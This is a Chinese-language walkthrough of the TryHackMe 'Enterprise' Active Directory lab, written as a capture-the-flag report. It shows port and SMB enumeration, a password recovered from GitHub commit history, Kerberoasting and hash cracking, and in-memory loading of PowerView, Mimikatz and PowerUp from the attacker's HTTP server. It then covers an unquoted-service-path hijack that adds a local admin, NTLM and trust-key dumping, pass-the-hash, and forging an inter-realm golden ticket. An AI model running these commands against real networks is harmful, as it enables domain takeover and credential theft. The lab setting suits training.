乐趣区

关于渗透测试:TryhackmeEnterpriseUnquoted-Service-Paths

服务探测

端口探测

root@ip-10-10-208-107:~# nmap -p- 10.10.59.205 --open

Starting Nmap 7.60 (https://nmap.org) at 2022-03-04 02:48 GMT
Nmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)
Host is up (0.0039s latency).
Not shown: 61918 closed ports, 3588 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
5985/tcp  open  wsman
7990/tcp  open  unknown
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown

服务探测

root@ip-10-10-208-107:~# nmap -sV -Pn 10.10.59.205 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5357,5985,7990,9389,47001,49664-49673

Starting Nmap 7.60 (https://nmap.org) at 2022-03-04 02:57 GMT
Nmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)
Host is up (0.00075s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Microsoft DNS
80/tcp    open   http          Microsoft IIS httpd 10.0
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-04 02:57:49Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
5357/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7990/tcp  open   http          Microsoft IIS httpd 10.0
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp closed unknown
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49673/tcp open   msrpc         Microsoft Windows RPC
MAC Address: 02:CC:01:6E:8F:D9 (Unknown)
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.08 seconds

smb

枚举分项目录

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# crackmapexec smb 10.10.59.205 -u ''-p'' --shares
SMB         10.10.59.205   445    LAB-DC           [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False)
SMB         10.10.59.205   445    LAB-DC           [-] LAB.ENTERPRISE.THM\: STATUS_ACCESS_DENIED 
SMB         10.10.59.205   445    LAB-DC           [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

不容许匿名登录,然而失去了
域的名称:LAB.ENTERPRISE.THM
DC 服务器的名字:LAB-DC

用 smbclient 再次枚举,这次呈现了分享的目录

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass -L //10.10.59.205

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Docs            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      Users Share. Do Not Touch!
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.59.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Users

能够登录

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass //10.10.59.205/Users
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Mar 11 21:11:49 2021
  ..                                 DR        0  Thu Mar 11 21:11:49 2021
  Administrator                       D        0  Thu Mar 11 16:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 17:53:06 2021
  bitbucket                           D        0  Thu Mar 11 21:11:51 2021
  Default                           DHR        0  Thu Mar 11 19:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018
  LAB-ADMIN                           D        0  Thu Mar 11 19:28:14 2021
  Public                             DR        0  Thu Mar 11 16:27:02 2021

                15587583 blocks of size 4096. 9920786 blocks available

整顿一个 user list

Administrator
atlbitbucket
bitbucket
LAB-ADMIN

尝试枚举下面用户是否敞开了 kerberos 预认证

找到一个用户凭据文件

smb: \LAB-ADMIN\AppData\Local\Microsoft\Credentials\> ls
  .                                 DSn        0  Thu Mar 11 19:28:46 2021
  ..                                DSn        0  Thu Mar 11 19:28:46 2021
  DFBE70A7E5CC19A398EBF1B96859CE5D   AHSn    11152  Thu Mar 11 18:09:04 2021

                15587583 blocks of size 4096. 9919566 blocks available

这个查了一下是 RDP 登录凭证,然而查了一下如同没有方法破解

Docs

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# smbclient --no-pass //10.10.59.205/Docs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Mar 14 22:47:35 2021
  ..                                  D        0  Sun Mar 14 22:47:35 2021
  RSA-Secured-Credentials.xlsx        A    15360  Sun Mar 14 22:46:54 2021
  RSA-Secured-Document-PII.docx       A    18432  Sun Mar 14 22:45:24 2021

有两个 office 文件,然而收到了密码保护,应用这个 office2john.py 转成能够被 john 辨认的哈希值,应用 john 破解,然而没有任何后果

http

80 端口没有任何有用的货色

7990 也是一个 http 端口,看上去跑了一个叫 ATLASSIAN 的 web app,但其实只是一个动态页面

登录框写了一行字:

Reminder to all Enterprise-THM Employees:We are moving to Github!

在谷歌上搜寻 enterprise-thm github 找到了这个 github 页面

只有一个 About-US 的 project

维护者是一个叫 Nik-enterprise-dev 的人,点进个人主页,还保护了一个 powershell 我的项目
只有一个脚本

Import-Module ActiveDirectory
$userName = ''$userPassword =''
$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force
$Computers = New-Object -TypeName "System.Collections.ArrayList"
$Computer = $(Get-ADComputer -Filter * | Select-Object Name)
for ($index = -1; $index -lt $Computer.count; $index++) {Invoke-Command -ComputerName $index {systeminfo} }

用户名和明码都为空

点击这个脚本的 history 页面,找到最后版本,记录了用户名和明码

Import-Module ActiveDirectory
$userName = 'nik'
$userPassword = 'ToastyBoi!'
$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force
$Computers = New-Object -TypeName "System.Collections.ArrayList"
$Computer = $(Get-ADComputer -Filter * | Select-Object Name)
for ($index = -1; $index -lt $Computer.count; $index++) {Invoke-Command -ComputerName $index {systeminfo} }

当初有了一个用户凭据

nik:ToastyBoi!

find SPN

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# python3 /opt/impacket/examples/GetUserSPNs.py  -dc-ip 10.10.59.205 lab.enterprise.thm/nik:ToastyBoi!  -request -outputfile hash.txt                                                                                               130 ⨯
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-11 20:20:01.333272  2021-04-26 11:16:41.570158   

失去一个用户的 SPN, 用 john 破解

┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# cat hash.txt 
$krb5tgs$23$*bitbucket$LAB.ENTERPRISE.THM$lab.enterprise.thm/bitbucket*$d286d86f986ebc5ed08752398bfa566a$878cf038efff7b158da57d8e041a07b03e4194ac25e7348658120d4bb26b762213465f35bb7b065aa5bbb321607d8d32a7044473170be71cddeb9df93a404ec3e45ac782c3f603a64b47d890deec82e96e2f20c15f3a55c5017ccb80544f41af572083863551d85a7d24c08700914cd170294f7c295b5312fa5e9ded3605705fe55d8acc0937f7268e4fef90254823400931c454833bc2acf4d319f67f336fb4984aeb6a51543336bb5fc68c43a7546b93b44abc518878b34b476545935a82630e5ded8cd7b201aff3da2f2e9015a5b679d6a39a0a419883169dd9b943ed9452c287b7778f7e367ffaa153e6238cf3b964a3842c7a82037cd0805c7b0df82e354588bfc8f256a02a91d70c03b58a564fbb04577b45670d7e5ec3b919244bc71df6afb7aa4ac7471f59e1c6e572dc28fb0fc142dd9d5b60e132e2c1820282b2c70e189af31484705d427bacfc89080a7738c6018a594eb9ac34140d0a8bdd625a5edf25caf543880203ec1779543ca06911a8375339b50ee3438126d894b1a7c15fa5d772bc2dcec1134399ccbfe98f07ea62ebd1d3970524b07be6d8f2bebb9be1470f2472bfe57656622b2767a045dbfe575a90bb25546ebd34e000d2175d107a0421c9a8a1968bee1c3736b3d35100f3edab7ecc4efb1b2ae185832d97e7c02b54a9e61c05875c72a2a21f0f94fef0a0ad35f7e77b2134605a56df3613061f4f3f25a43e3c185a861d1af30d2e4451cfe7fcc15a6aafb963160d941e286366f695f44cab437e83b85bbe06f0601fdd3fc686108b14bb33b91f1fb0ad9fb88e460ef7cfe59f729b18f84226977f58f8fa35eb6f66ce9dda6188b64e23f27f73a206b8640b46132bc73b1efb47c8bf9788010f26c2a9f70581488896a729c814763e7d69bfdcb26675da14c9dc27b99ea412cb07d6030d0d6b2fa57fa71aa8d6530c98741dd16722ee29e77e3f5635db125ee79df40d3df607bc6fc2217cfe6e08c4c6e545c3597f526f9efd1aecf4869cab95eb61c3c627edefb0c8661d081d2b704502f7d6ca8ab4c8df6134accaef9e8e8a3d5eeb54e3054e54eca1991db472ff9e4371301c8a59cff106c343d064d789d409b7f69ce96b8e8091c323ed9edd09beda75555d866b71a6e10d7eef8406ea47aaa77b040f06ad9e688deef6942e2076e285b02ce67104d816f9dfe323b348d97d2790ac12545e7b5fc4a92ba7da5fcab00e47146111bd0cff0c925f33674ffbf972522d295b08ec1eb07c206590634bcfa000d32d4b63296e864606282307059645816bd50c5d12d5c63e671f062f84b5e7c6efacef5d940f75cc9a149801ffe5f49f068f8d62eebabcd2cb1a604b72
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/Enterprise]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littleredbucket  (?)     
1g 0:00:00:01 DONE (2022-03-04 00:56) 0.8620g/s 1354Kp/s 1354Kc/s 1354KC/s livelife93..liss27
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

账号:bitbucket
明码:littleredbucket

应用上面命令 rdp 连贯靶机

xfreerdp /f /u:bitbucket /p:littleredbucket /v:10.10.59.205 /size:1280x1030

桌面找到用户 flag

本地权限晋升

在 kali 起一个繁难 http 服务器,通过 http 把枚举和提权工具传到靶机

iex (iwr http://10.11.63.196/PowerView.ps1 -UseBasicParsing)

iex (iwr http://10.11.63.196/SharpHound.ps1 -UseBasicParsing)

iex (iwr http://10.11.63.196/Invoke-Mimikatz.ps1  -UseBasicParsing)

iex (iwr http://10.11.63.196/PowerUp.ps1  -UseBasicParsing)

枚举所有域用户

PS C:\Users\bitbucket> get-netuser|select cn

cn
--
Administrator
Guest
atlbitbucket
krbtgt
BitBucker
nik
REPLICATION
spooks
Korone
Banana
Cake
Contractor
Varg
Joiner

枚举所有 DA 用户

PS C:\Users\bitbucket\Desktop> Get-NetGroupMember -GroupName "Domain Admins" -Recurse |select MemberName

MemberName
----------
joiner
Cake
korone
Administrator

应用 SharpHound 手机域信息

Invoke-BloodHound -CollectionMethod All -verbose

如何把文件从靶机传回 kali,这里应用 smb,因为咱们有了 bitbucket 的登录凭证,能够放到 users 的 bitbucket 下,而后应用 smb 下载

应用 PowerUp,发现存在一个 unquoted service paths 的服务

[*] Checking for unquoted service paths...


ServiceName    : zerotieroneservice
Path           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>
CanRestart     : True

ServiceName    : zerotieroneservice
Path           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>
CanRestart     : True

通过简略测试,发现能够在 C:\Program Files (x86)\Zero Tier\ 写入文件,并且对这个服务有重启的权限

用 Write-ServiceBinary 办法,写一个 Zero.exe

PS C:\Program Files (x86)\Zero Tier> Write-ServiceBinary -Name 'zerotieroneservice' -Path 'C:\Program Files (x86)\Zero Tier\Zero.exe'

ServiceName        Path                                      Command
-----------        ----                                      -------
zerotieroneservice C:\Program Files (x86)\Zero Tier\Zero.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add

这一步次要是创立了一个叫 john 的用户,明码是Password123!,并且把 john 退出到本地管理员组

已存在在目标目录

PS C:\Program Files (x86)\Zero Tier> ls


    Directory: C:\Program Files (x86)\Zero Tier


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/14/2021   6:08 PM                Zero Tier One
-a----         3/4/2022  12:58 AM              6 1.txt
-a----         3/4/2022   1:01 AM          22016 Zero.exe

重启服务

PS C:\Program Files (x86)\Zero Tier> sc.exe stop zerotieroneservice
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\Program Files (x86)\Zero Tier> sc.exe start zerotieroneservice

SERVICE_NAME: zerotieroneservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 5348
        FLAGS              :

当初,在桌面已管理员权限开启一个 shell,输出用户凭据:john:Password123!

胜利开启一个管理员权限的 shell

PS C:\Windows\system32> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ============================================
lab-enterprise\john S-1-5-21-2168718921-3906202695-65158103-1120


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

能够看到曾经存在在 BUILTIN\Administrators 用户组

拿到 root.txt

PS C:\users\Administrator\Desktop> type .\root.txt
THM{1a1fa948754212963...}

跨域(没有胜利)

枚举所有信赖关系

PS C:\users\bitbucket\Desktop> Get-NetForestDomain -Verbose | Get-NetDomainTrust

SourceName         TargetName       TrustType TrustDirection
----------         ----------       --------- --------------
LAB.ENTERPRISE.THM ENTERPRISE.THM ParentChild  Bidirectional
LAB.ENTERPRISE.THM morimori.com      Kerberos       Outbound

发现跟父域是双向信赖的

应用 Mimikatz 导出所有 NTML 哈希

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             (vincent.letoux@gmail.com)
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 8537943ee84c50d9d4035c519ce2cb68

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 43c1c941c7f0eb3a74d8864ab7dfa212

<skip>

以 Administrator 身份开启一个 shell

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:LAB.ENTERPRISE.THM /ntlm:8537943ee84c50d9d4035c519ce2cb68 /run:powershell.exe"'

枚举 DC 服务器的所有信赖关系

PS C:\Windows\system32> Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName LAB-DC.LAB.ENTERPRISE.THM

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             (vincent.letoux@gmail.com)
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::trust /patch

Current domain: LAB.ENTERPRISE.THM (LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103)

Domain: ENTERPRISE.THM (ENTERPRISE / S-1-5-21-1835041512-953509921-1126143443)
 [In] LAB.ENTERPRISE.THM -> ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c
        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [Out] ENTERPRISE.THM -> LAB.ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e
        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [In-1] LAB.ENTERPRISE.THM -> ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c
        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

 [Out-1] ENTERPRISE.THM -> LAB.ENTERPRISE.THM
    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e
        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f


Domain: MORIMORI.COM (morimori.comERROR kull_m_string_displaySID ; ConvertSidToStringSid (0x00000057)
)
 [In] LAB.ENTERPRISE.THM -> MORIMORI.COM

 [Out] MORIMORI.COM -> LAB.ENTERPRISE.THM
    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00
        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382
        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502
        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852

 [In-1] LAB.ENTERPRISE.THM -> MORIMORI.COM

 [Out-1] MORIMORI.COM -> LAB.ENTERPRISE.THM
    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00
        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382
        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502
        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852

伪造一条到父域 ENTERPRISE.THM 的 TGT

从下面信息咱们得悉,父域的 SID 是:S-1-5-21-1835041512-953509921-1126143443

这里须要留神上面命令参数里的 rc4,必须是下面枚举进去的
* rc4_hmac_nt d84d2d46e70ebdcd94ec6f3c79f5731f 这个值

伪造 TGT

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'

执行

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             (vincent.letoux@gmail.com)
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi
User      : Administrator
Domain    : LAB.ENTERPRISE.THM (LAB)
SID       : S-1-5-21-2168718921-3906202695-65158103
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1835041512-953509921-1126143443-519 ;
ServiceKey: d84d2d46e70ebdcd94ec6f3c79f5731f - rc4_hmac_nt
Service   : krbtgt
Target    : ENTERPRISE.THM
Lifetime  : 3/4/2022 1:37:00 AM ; 3/1/2032 1:37:00 AM ; 3/1/2032 1:37:00 AM
-> Ticket : C:\users\bitbucket\Desktop\trust_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

查看以后林

PS C:\users\bitbucket\Desktop> Get-NetForest


RootDomainSid         : S-1-5-21-1835041512-953509921-1126143443
Name                  : ENTERPRISE.THM
Sites                 : {Default-First-Site-Name}
